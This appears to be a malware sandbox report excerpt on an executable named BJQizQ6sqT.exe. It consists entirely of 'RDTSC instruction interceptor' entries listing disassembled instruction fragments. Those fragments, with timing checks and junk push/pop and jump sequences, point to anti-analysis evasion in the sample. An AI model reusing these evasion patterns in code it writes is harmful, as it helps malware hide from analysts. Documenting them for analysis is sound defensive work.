              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D127BF second address: D127CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC0410B9FACh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D127CB second address: D127D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007FC040F643F6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D127D7 second address: D127DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D1296D second address: D12995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC040F64400h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC040F643FCh 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12995 second address: D12999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12C54 second address: D12C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC040F64401h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12C69 second address: D12C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12C6F second address: D12C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12C73 second address: D12C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12DE4 second address: D12DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jc 00007FC040F643F6h 0x0000000e pop edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12DF3 second address: D12DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D17273 second address: D1727D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC040F643FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D18E12 second address: D18E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC0410B9FB0h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D18E2B second address: D18E47 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC040F643F6h 0x00000008 jnl 00007FC040F643F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 pushad 0x00000012 jng 00007FC040F643FEh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D1AEEE second address: D1AEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C34E9F second address: C34EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 je 00007FC040F643F6h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 je 00007FC040F643FCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F6035A second address: 4F60360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60360 second address: 4F60364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60364 second address: 4F60375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, edi 0x0000000e push ebx 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60375 second address: 4F6038E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC040F64405h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F6038E second address: 4F60392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60392 second address: 4F603A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F603A2 second address: 4F603A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F603A9 second address: 4F603C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F603C0 second address: 4F603C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F603C6 second address: 4F603E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC040F64409h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F603E3 second address: 4F60420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC0410B9FB5h 0x00000014 sbb ecx, 449229D6h 0x0000001a jmp 00007FC0410B9FB1h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60420 second address: 4F60426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60426 second address: 4F6042A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F6042A second address: 4F6043E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 movzx ecx, dx 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F6043E second address: 4F60444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60444 second address: 4F60448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80795 second address: 4F8079B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F8079B second address: 4F807A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F807A1 second address: 4F807D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FC0410B9FACh 0x00000014 pop eax 0x00000015 mov edx, 2F8E3A96h 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80921 second address: 4F8093C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007FC040F64434h 0x0000000d pushad 0x0000000e call 00007FC040F643FBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F8093C second address: 4F80945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 mov ch, bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F8098A second address: 4F809B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC040F64405h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F809B1 second address: 4F70040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 jmp 00007FC0410B9FA2h 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007FC0410B9FA7h 0x0000001b sub esp, 04h 0x0000001e mov dword ptr [esp], 0000000Dh 0x00000025 call 00007FC0455C759Bh 0x0000002a mov edi, edi 0x0000002c pushad 0x0000002d jmp 00007FC0410B9FAEh 0x00000032 mov ch, 9Bh 0x00000034 popad 0x00000035 push ebp 0x00000036 pushad 0x00000037 movzx esi, bx 0x0000003a jmp 00007FC0410B9FB5h 0x0000003f popad 0x00000040 mov dword ptr [esp], ebp 0x00000043 pushad 0x00000044 mov edx, eax 0x00000046 mov ch, 4Ah 0x00000048 popad 0x00000049 mov ebp, esp 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70040 second address: 4F7005C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F64408h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F7005C second address: 4F70062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70062 second address: 4F70066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70066 second address: 4F7006A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F7006A second address: 4F70097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b jmp 00007FC040F64409h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov eax, 562374F3h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70097 second address: 4F700BD instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC0410B9FB9h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F700BD second address: 4F700C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F700C1 second address: 4F700C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F700C7 second address: 4F7012F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC040F643FAh 0x00000009 sbb al, 00000058h 0x0000000c jmp 00007FC040F643FBh 0x00000011 popfd 0x00000012 call 00007FC040F64408h 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebx 0x0000001c jmp 00007FC040F64401h 0x00000021 xchg eax, edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC040F64408h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F7012F second address: 4F70135 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70135 second address: 4F70158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC040F643FEh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70158 second address: 4F7015E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F7015E second address: 4F70162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70162 second address: 4F70171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70171 second address: 4F70175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70175 second address: 4F70187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F701D8 second address: 4F7024D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b jmp 00007FC040F643FFh 0x00000010 inc ebx 0x00000011 pushad 0x00000012 call 00007FC040F64404h 0x00000017 mov si, 9CB1h 0x0000001b pop esi 0x0000001c mov ah, dl 0x0000001e popad 0x0000001f test al, al 0x00000021 jmp 00007FC040F64406h 0x00000026 je 00007FC040F64599h 0x0000002c jmp 00007FC040F64400h 0x00000031 lea ecx, dword ptr [ebp-14h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F7024D second address: 4F7026A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F7026A second address: 4F7027A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC040F643FCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F7027A second address: 4F7027E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F702FE second address: 4F70304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70304 second address: 4F70308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70308 second address: 4F7030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F7036C second address: 4F703BB instructions: 0x00000000 rdtsc 0x00000002 call 00007FC0410B9FB2h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edi, 550674A6h 0x0000000f popad 0x00000010 cmp dword ptr [ebp-14h], edi 0x00000013 jmp 00007FC0410B9FADh 0x00000018 jne 00007FC0B2AA80A8h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC0410B9FB8h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F703BB second address: 4F703BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F703BF second address: 4F703C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F703C5 second address: 4F703E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 mov ecx, edi 0x00000012 popad 0x00000013 lea eax, dword ptr [ebp-2Ch] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F703E7 second address: 4F703FF instructions: 0x00000000 rdtsc 0x00000002 mov al, 7Ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, 0D1Ch 0x0000000a popad 0x0000000b push esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 30738720h 0x00000014 mov si, bx 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F703FF second address: 4F70442 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC040F64400h 0x00000008 pushfd 0x00000009 jmp 00007FC040F64402h 0x0000000e sub cx, 1498h 0x00000013 jmp 00007FC040F643FBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], esi 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70442 second address: 4F70446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70446 second address: 4F7044C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F7044C second address: 4F70462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, F5h 0x00000005 mov al, dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dx, D23Ch 0x00000012 movsx edx, si 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70462 second address: 4F704B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 pushfd 0x00000007 jmp 00007FC040F64406h 0x0000000c adc al, FFFFFF88h 0x0000000f jmp 00007FC040F643FBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a jmp 00007FC040F643FFh 0x0000001f popad 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC040F64400h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F704B6 second address: 4F704EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov si, ABEBh 0x0000000f jmp 00007FC0410B9FB0h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC0410B9FADh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F704EE second address: 4F704F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F704F2 second address: 4F704F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F704F8 second address: 4F704FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60D72 second address: 4F60DDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC0410B9FB4h 0x00000011 and cl, 00000038h 0x00000014 jmp 00007FC0410B9FABh 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007FC0410B9FB8h 0x00000020 sub esi, 462D3598h 0x00000026 jmp 00007FC0410B9FABh 0x0000002b popfd 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60DDA second address: 4F60DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60DDE second address: 4F60DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60DF0 second address: 4F60E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC040F643FEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60E02 second address: 4F60E19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60E19 second address: 4F60E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, bx 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60E21 second address: 4F60E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC0410B9FB9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60E3E second address: 4F60E51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60E51 second address: 4F60E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
